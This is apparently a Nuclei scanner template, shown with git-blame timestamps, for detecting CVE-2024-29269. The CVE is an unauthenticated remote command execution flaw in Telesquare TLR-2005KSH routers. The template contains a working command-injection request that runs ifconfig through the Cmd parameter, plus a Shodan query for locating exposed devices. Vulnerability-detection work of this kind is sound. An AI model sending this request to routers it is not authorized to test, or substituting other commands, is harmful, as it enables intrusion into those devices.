2024-04-04 17:28:45 +00:00
id : CVE-2024-29269
info :
name : Telesquare TLR-2005KSH - Remote Command Execution
author : ritikchaddha
severity : critical
description : |
Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.
reference :
- https://github.com/wutalent/CVE-2024-29269/blob/main/index.md
- https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b
2024-05-31 19:23:20 +00:00
- https://github.com/Ostorlab/KEV
- https://github.com/YongYe-Security/CVE-2024-29269
- https://github.com/nomi-sec/PoC-in-GitHub
2024-04-04 17:28:45 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2024-29269
2024-05-31 19:23:20 +00:00
epss-score : 0.00054
epss-percentile : 0.21518
2024-04-04 17:28:45 +00:00
metadata :
max-request : 1
shodan-query : title:"Login to TLR-2005KSH"
tags : cve,cve2024,telesquare,tlr,rce
http :
- raw :
- |
2024-04-04 17:46:28 +00:00
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
2024-04-04 17:28:45 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
2024-04-04 17:36:17 +00:00
- type : word
part : body
words :
2024-04-04 17:28:45 +00:00
- '<CmdResult>'
- '</xml>'
2024-04-04 17:36:17 +00:00
- 'Ethernet'
- 'inet'
condition : and
2024-04-04 17:28:45 +00:00
- type : word
part : header
words :
- 'text/xml'
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4a0a004730450221008b5117d474664154b7b9b2b8f2c14284599c81fcbe172df27d9793b3b4a8d65602206c4b5689c81e4a2e53e1e5917aa6e6dd97595c1d5a8c1313772ee7aea8d2473d:922c64590222798bb761d5b6d8e72950
